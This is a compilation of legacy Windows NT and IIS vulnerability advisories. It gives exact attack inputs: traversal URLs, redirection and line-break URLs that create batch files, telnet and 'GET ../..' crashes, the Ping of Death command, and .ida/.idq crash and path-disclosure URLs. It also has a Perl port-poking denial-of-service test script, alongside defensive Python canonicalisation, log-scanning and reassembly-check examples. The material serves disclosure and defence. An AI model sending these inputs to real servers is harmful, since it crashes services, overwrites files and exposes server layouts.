Affected systems: 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
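As an added example (not code from the original posting), here is a Python canonicaliser that resolves a request path the way an NT filesystem would before any access decision is made on it. The function names, the sample paths and the choice to percent-decode twice are assumptions of the example, not something the note states.

```python
from typing import List, Optional
from urllib.parse import unquote


def canonical_request_path(raw_path: str) -> Optional[str]:
    """Resolve a request path and return its root-relative canonical form,
    or None if it climbs above the content root.

    - percent-decodes twice, so '%5c' -> '\\' and a double-encoded
      '%255c' -> '\\' (double decoding is an assumption of this example)
    - treats '\\' like '/' because NT accepts both as separators
    - drops empty and '.' segments, pops one kept segment per '..'
    - a '..' with nothing left to pop means the request escaped the root
    """
    decoded = unquote(unquote(raw_path))
    unified = decoded.replace("\\", "/")
    parts: List[str] = []
    for segment in unified.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not parts:
                return None            # escaped the content root
            parts.pop()
        else:
            parts.append(segment)
    return "/" + "/".join(parts)


def authorised_for_scripts(raw_path: str) -> bool:
    """Example access check (hypothetical policy): is the request really
    inside /scripts once canonicalised? A prefix test on the raw URL would
    pass '/scripts..\\..\\scriptname', which actually resolves to '/scriptname'."""
    canonical = canonical_request_path(raw_path)
    return canonical is not None and canonical.startswith("/scripts/")


if __name__ == "__main__":
    for probe in ("/..\\..", "/scripts..\\..\\scriptname",
                  "/scripts/%252e%252e/cmd.exe", "/docs/./index.htm"):
        print(f"{probe!r:40} -> {canonical_request_path(probe)!r}")
```

The second function is the point of the exercise: '/scripts..\..\scriptname' begins with /scripts, so a prefix test on the raw URL passes it, but the filesystem is asked for /scriptname. Authorisation has to be decided on the canonical form, which is the only form the filesystem ever sees.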

---------------------------------------------------------------------
Affected systems: 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'. The '>' in the URL reaches the command interpreter that runs the batch file and is treated as output redirection.

If the file 'target.bat' already exists, it will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will also create an output file 'target.bat'; the encoded line feed and carriage return end the script's command line so that what follows is run as a second one.
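As an added example, not part of the original posting, the following Python scans web-server log lines for the request shapes described in this item and the previous one: the '..\..' traversal, the '>PATH' redirection handed to the command interpreter, and the '%0A%0D' line break. The log layout (IIS W3C extended fields in the order date time c-ip cs-method cs-uri-stem cs-uri-query sc-status), the sample lines, the addresses and the rule names are all constructed for the example.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# Constructed log lines for the example (assumed W3C extended field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status). Not from the page.
SAMPLE_LOG = """\
1998-03-02 10:01:12 192.0.2.10 GET /default.htm - 200
1998-03-02 10:01:40 192.0.2.77 GET /..%5c..%5cwinnt/win.ini - 200
1998-03-02 10:02:05 192.0.2.77 GET /scripts/exploit.bat>c:\\inetpub\\scripts\\target.bat - 502
1998-03-02 10:02:31 192.0.2.77 GET /scripts/script_name%0A%0D>c:\\temp\\target.bat - 502
1998-03-02 10:03:00 192.0.2.10 GET /images/logo.gif - 200
1998-03-02 10:03:20 192.0.2.77 GET /scripts..%5c..%5ccmd.exe /c+dir 200
"""

FIELDS = ("date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one W3C log line into named fields; None if the shape is wrong."""
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def classify(stem: str, query: str) -> List[str]:
    """Names of the rules a request trips, in a fixed order (empty = clean)."""
    raw = stem if query == "-" else stem + "?" + query
    decoded = unquote(unquote(raw))          # decode twice to catch %255c as well as %5c
    unified = decoded.replace("\\", "/")     # NT accepts either separator
    hits: List[str] = []
    if re.search(r"(^|/)\.\.(/|$)", unified):
        hits.append("traversal")             # a '..' segment: '..\..' out of the content root
    if re.search(r"[<>|]", decoded):
        hits.append("shell-redirect")        # '>PATH\target.bat' handed to the command interpreter
    if "\r" in decoded or "\n" in decoded:
        hits.append("crlf")                  # '%0A%0D' starts a second command line
    return hits


def scan(log_text: str) -> List[Tuple[str, str, List[str]]]:
    """(client ip, raw uri-stem, rules hit) for every suspicious line."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec["cs-uri-stem"], rec["cs-uri-query"])
        if hits:
            findings.append((rec["c-ip"], rec["cs-uri-stem"], hits))
    return findings


if __name__ == "__main__":
    for ip, stem, hits in scan(SAMPLE_LOG):
        print(f"{ip} {','.join(hits):22} {stem}")
```

Matching on the decoded field is deliberate: the traversal is just as likely to appear in the raw log as '%5c' or '%255c' as it is as a literal backslash, and a rule that only inspects the raw field misses those.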

----------------------------------------------------------------------

Affected systems: 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than its usual processor time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script, gleaned from postings on the NTsecurity@iss.net list, to test the ports on your own system (Perl is available from the NT Resource Kit):

/*begin poke code*/

# poke: connect to every TCP port on a host, send a short string and close,
# to find services that get 'confused' by unexpected input (see above).
# Uses the core IO::Socket::INET module in place of the Perl 4-era chat2.pl
# library the original script required; the behaviour is the same.
use strict;
use warnings;
use IO::Socket::INET;

my $systemname = shift @ARGV or die "usage: perl poke servername\n";

my $verbose    = 1;   # tell me what you're hitting
my $knownports = 1;   # don't hit known problem ports (53, 135, 1031)

# The original loop began at $0 (the script's own name), a typo for 0;
# port 0 cannot be connected to, so start at 1.
for (my $port = 1; $port < 65535; $port++) {
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    print "Trying port: $port\n" if $verbose;
    # Nothing listening means connection refused; move on to the next port.
    my $fh = IO::Socket::INET->new(
        PeerAddr => $systemname,
        PeerPort => $port,
        Proto    => 'tcp',
        Timeout  => 2,
    ) or next;
    print $fh "This is about ten characters or more\r\n";
    close $fh;
}

/*end poke code*/

Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername
Run it only against systems you are responsible for: as noted above, the known problem ports it skips by default leave RPCSS, inetinfo or DNS wedged until a reboot or service restart, and other ports may behave the same way.

--------------------------------------------------------------------------------

Affected systems: 4.0
Connecting to the web server on HTTP port 80 with a telnet client and typing "GET ../.." followed by <CR> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error. The error occurred on date@time. The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT)"

Exception code c0000005 is STATUS_ACCESS_VIOLATION: the malformed request line is reaching a memory fault inside inetinfo.exe rather than being rejected as bad syntax.

---------------------------------------------------------------------------------

Affected systems: 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems. 65527 data bytes plus the 8-byte ICMP header and the 20-byte IP header make a 65555-byte datagram, more than the 65535 bytes the 16-bit IP length field allows; it leaves the sender as fragments, and the receiving stack overruns its reassembly buffer putting them back together. The STOP codes seen are:

STOP: 0x0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
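
As an added example (not from the original note), the following Python models the arithmetic behind that crash: how a sender fragments a datagram too large to exist, what a reassembly routine that trusts offset plus length would write, and the bounds check it needs before copying a fragment into its 64 KiB buffer. The 1500-byte MTU, the absence of IP options (so the -s 1 timestamp option is ignored) and the function names are assumptions of the example.

```python
from typing import List, Tuple

MAX_DATAGRAM = 65535      # the IP total-length field is 16 bits
IP_HEADER = 20            # bytes, assuming no IP options
ICMP_HEADER = 8           # echo request: type, code, checksum, identifier, sequence
MAX_PAYLOAD = MAX_DATAGRAM - IP_HEADER - ICMP_HEADER   # 65507: largest legal data size

Fragment = Tuple[int, int, bool]   # (offset in bytes, data length, more-fragments flag)


def echo_request_length(payload_len: int) -> int:
    """Total datagram size an echo request with this much data needs."""
    return IP_HEADER + ICMP_HEADER + payload_len


def fragment(payload_len: int, mtu: int = 1500) -> List[Fragment]:
    """Split the ICMP echo (header + data) into IP fragments the way a sending
    stack does: each fragment gets its own IP header, data per fragment and
    offsets are multiples of 8. No total-size check is made here, which is
    why an oversized ping leaves the sender at all."""
    total = ICMP_HEADER + payload_len                 # bytes after the IP header
    per_fragment = (mtu - IP_HEADER) // 8 * 8         # 1480 for a 1500-byte MTU
    frags: List[Fragment] = []
    offset = 0
    while offset < total:
        n = min(per_fragment, total - offset)
        assert offset // 8 < 8192, "offset no longer fits the 13-bit field"
        frags.append((offset, n, offset + n < total))
        offset += n
    return frags


def reassemble_unchecked(frags: List[Fragment]) -> int:
    """What a stack that trusts offset+length ends up writing: the size of the
    reassembled datagram. Anything above MAX_DATAGRAM ran past the fixed
    reassembly buffer, which is the TCPIP.SYS crash described above."""
    return IP_HEADER + max(off + n for off, n, _ in frags)


def reassemble_checked(frags: List[Fragment]) -> int:
    """Reassembly with the check a fixed stack applies: reject any fragment
    whose end would lie past the 65535-byte limit before copying it."""
    end = 0
    for off, n, _ in frags:
        if IP_HEADER + off + n > MAX_DATAGRAM:
            raise ValueError(f"fragment at offset {off} with {n} bytes overruns the datagram limit")
        end = max(end, off + n)
    return IP_HEADER + end


if __name__ == "__main__":
    print("largest legal -l value:", MAX_PAYLOAD)
    print("ping -l 65527 needs:", echo_request_length(65527), "bytes")
    print("unchecked reassembly writes:", reassemble_unchecked(fragment(65527)), "bytes")
    try:
        reassemble_checked(fragment(65527))
    except ValueError as err:
        print("checked reassembly:", err)
```

The last fragment is the one that does the damage: its 13-bit offset (65120 bytes, well within the field) is legal on its own, so only the sum offset + length reveals that the datagram as a whole is too big, and that sum is exactly what an unpatched reassembly routine never computes before copying.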

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving them.
--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending in "ida". The problem can have two kinds of result. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively a denial of service against the server). All IIS versions up to and including IIS 5.0 are vulnerable. When a remote attacker issues a request with the malformed URL:

http://www.example.com/...[25kb of '.']...ida

the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be made to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ or IDA extension. By requesting a URL such as:

http://www.microsoft.com/anything.ida

or:

http://www.microsoft.com/anything.idq

a remote user gets a response that looks like:

'The IDQ d:\http\anything.idq could not be found'

Such a response lets him gain further knowledge of how the web site is organized and of the directory structure of the server.